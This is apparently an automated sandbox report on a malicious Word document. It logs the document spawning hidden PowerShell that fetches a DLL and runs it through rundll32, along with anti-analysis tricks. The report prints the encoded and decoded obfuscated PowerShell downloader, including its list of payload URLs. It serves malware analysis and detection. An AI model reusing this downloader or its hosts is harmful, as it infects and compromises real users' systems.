Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2488 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: powershell.exe, 00000005.00000002.2086923820.0000000000373000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_01FF3278 mov eax, dword ptr fs:[00000030h] 7_2_01FF3278
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002327EC mov eax, dword ptr fs:[00000030h] 7_2_002327EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_01FF3278 mov eax, dword ptr fs:[00000030h] 8_2_01FF3278
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C27EC mov eax, dword ptr fs:[00000030h] 8_2_001C27EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001A27EC mov eax, dword ptr fs:[00000030h] 9_2_001A27EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_005927EC mov eax, dword ptr fs:[00000030h] 10_2_005927EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00403278 mov eax, dword ptr fs:[00000030h] 11_2_00403278
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001A27EC mov eax, dword ptr fs:[00000030h] 11_2_001A27EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00403278 mov eax, dword ptr fs:[00000030h] 12_2_00403278
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002027EC mov eax, dword ptr fs:[00000030h] 12_2_002027EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_01FF27EC mov eax, dword ptr fs:[00000030h] 13_2_01FF27EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001E27EC mov eax, dword ptr fs:[00000030h] 14_2_001E27EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_002E27EC mov eax, dword ptr fs:[00000030h] 15_2_002E27EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_00363278 mov eax, dword ptr fs:[00000030h] 16_2_00363278
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_004827EC mov eax, dword ptr fs:[00000030h] 16_2_004827EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 17_2_00373278 mov eax, dword ptr fs:[00000030h] 17_2_00373278
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 17_2_004327EC mov eax, dword ptr fs:[00000030h] 17_2_004327EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_001B27EC mov eax, dword ptr fs:[00000030h] 18_2_001B27EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_001927EC mov eax, dword ptr fs:[00000030h] 19_2_001927EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00273278 mov eax, dword ptr fs:[00000030h] 20_2_00273278
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_001C27EC mov eax, dword ptr fs:[00000030h] 20_2_001C27EC
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory protected: page write copy | page execute | page execute read | page execute and read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Encrypted powershell cmdline option found
Source: unknown Process created: Base64 decoded SeT-ITEM ('v'+'ARia'+'BlE:f'+'7D'+'H') ( [TYPe]("{2}{0}{4}{1}{3}"-F 'SteM.iO','cto','sy','ry','.dire')) ; sEt-ItEM VaRiABLe:Sg2xU ( [TyPe]("{7}{4}{5}{1}{8}{2}{0}{6}{3}"-F'AnAg','CEPoIn','M','R','TEm.Net.SEr','vI','E','SYs','t') ); $Zz82_42=$B03I + [char](33) + $K78S;$O00G=('E_'+'6Z'); $F7DH::"crEA`TEDI`R`ecTORy"($HOME + ((('egTL'+'xb'+'f')+'yv'+'k'+'eg'+'T'+'Gc'+('qt'+'r_f')+('eg'+'T'))."rePL`ACE"(([CHAR]101+[CHAR]103+[CHAR]84),[string][CHAR]92)));$P46U=('A'+('65'+'Q')); $SG2XU::"s`ECu`RiTYprOTo`c`Ol" = ('Tl'+('s1'+'2'));$I_7R=('D'+('75'+'G'));$Yzjqxxq = ('C4'+'6T');$L__S=(('P_'+'_')+'D');$Uk1tt1_=$HOME+(('H'+('Ox'+'Lxbf')+'y'+'v'+('kHOx'+'Gcq')+'t'+('r_f'+'HOx'))."rEpl`Ace"(('HO'+'x'),[stRINg][CHaR]92))+$Yzjqxxq+'.d' + 'll';$T55L=(('Y'+'21')+'Q');$Jg41scw='h' + 'tt' + 'p';$Niooi2q=(('n'+'s wu ')+('d'+'b ')+('nd'+':')+('//'+'ni')+'gh'+('t'+'lifemu'+'mb')+'a'+('i.'+'cl')+('ub/x'+'/0w'+'B')+('D3'+'/!n'+'s w')+'u '+'d'+'b'+(' nd'+'s')+':/'+('/'+'sho')+('p.no'+'w')+'f'+('al.d'+'e')+'v'+'/w'+('p-in'+'c')+('lu'+'de')+('s/R'+'lMO'+'bf')+('2j0'+'/!ns w'+'u')+(' '+'db '+'nd:/')+'/'+('e-'+'w'+'design')+'.'+('e'+'u/wp')+'-'+'c'+('o'+'nte')+('nt'+'/'+'bn1Ig'+'D'+'ejh/!ns ')+('wu'+' d'+'b nd')+':/'+'/'+'t'+('ra'+'umf')+'r'+'a'+('ue'+'n')+('-uk'+'r')+('ai'+'ne'+'.de')+'/b'+('in'+'/Jye')+('S/!'+'ns wu ')+('d'+'b ')+('n'+'ds:')+('//'+'jflm')+('kt'+'g.wpc')+'om'+('sta'+'gi'+'ng.'+'c'+'om/wp'+'-content')+('/AK'+'/')+('!ns'+' wu ')+('db '+'nd')+('s:'+'//lin')+'hk'+('i'+'en')+'m
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded SeT-ITEM ('v'+'ARia'+'BlE:f'+'7D'+'H') ( [TYPe]("{2}{0}{4}{1}{3}"-F 'SteM.iO','cto','sy','ry','.dire')) ; sEt-ItEM VaRiABLe:Sg2xU ( [TyPe]("{7}{4}{5}{1}{8}{2}{0}{6}{3}"-F'AnAg','CEPoIn','M','R','TEm.Net.SEr','vI','E','SYs','t') ); $Zz82_42=$B03I + [char](33) + $K78S;$O00G=('E_'+'6Z'); $F7DH::"crEA`TEDI`R`ecTORy"($HOME + ((('egTL'+'xb'+'f')+'yv'+'k'+'eg'+'T'+'Gc'+('qt'+'r_f')+('eg'+'T'))."rePL`ACE"(([CHAR]101+[CHAR]103+[CHAR]84),[string][CHAR]92)));$P46U=('A'+('65'+'Q')); $SG2XU::"s`ECu`RiTYprOTo`c`Ol" = ('Tl'+('s1'+'2'));$I_7R=('D'+('75'+'G'));$Yzjqxxq = ('C4'+'6T');$L__S=(('P_'+'_')+'D');$Uk1tt1_=$HOME+(('H'+('Ox'+'Lxbf')+'y'+'v'+('kHOx'+'Gcq')+'t'+('r_f'+'HOx'))."rEpl`Ace"(('HO'+'x'),[stRINg][CHaR]92))+$Yzjqxxq+'.d' + 'll';$T55L=(('Y'+'21')+'Q');$Jg41scw='h' + 'tt' + 'p';$Niooi2q=(('n'+'s wu ')+('d'+'b ')+('nd'+':')+('//'+'ni')+'gh'+('t'+'lifemu'+'mb')+'a'+('i.'+'cl')+('ub/x'+'/0w'+'B')+('D3'+'/!n'+'s w')+'u '+'d'+'b'+(' nd'+'s')+':/'+('/'+'sho')+('p.no'+'w')+'f'+('al.d'+'e')+'v'+'/w'+('p-in'+'c')+('lu'+'de')+('s/R'+'lMO'+'bf')+('2j0'+'/!ns w'+'u')+(' '+'db '+'nd:/')+'/'+('e-'+'w'+'design')+'.'+('e'+'u/wp')+'-'+'c'+('o'+'nte')+('nt'+'/'+'bn1Ig'+'D'+'ejh/!ns ')+('wu'+' d'+'b nd')+':/'+'/'+'t'+('ra'+'umf')+'r'+'a'+('ue'+'n')+('-uk'+'r')+('ai'+'ne'+'.de')+'/b'+('in'+'/Jye')+('S/!'+'ns wu ')+('d'+'b ')+('n'+'ds:')+('//'+'jflm')+('kt'+'g.wpc')+'om'+('sta'+'gi'+'ng.'+'c'+'om/wp'+'-content')+('/AK'+'/')+('!ns'+' wu ')+('db '+'nd')+('s:'+'//lin')+'hk'+('i'+'en')+'m Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArAC Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Itwxrtu\wpjaux.bsi',JnNGuImBTNGmQ Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Itwxrtu\wpjaux.bsi',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gesxrslxkhcnse\kfdzbsrddlvak.pye',cGgBEdar Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gesxrslxkhcnse\kfdzbsrddlvak.pye',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqecxzw\ccpuwn.kyt',VWMVjHoJWTwKe Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqecxzw\ccpuwn.kyt',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Swvcgiaelz\sxbljovgm.oha',GOGZBCfUK Jump to behavior
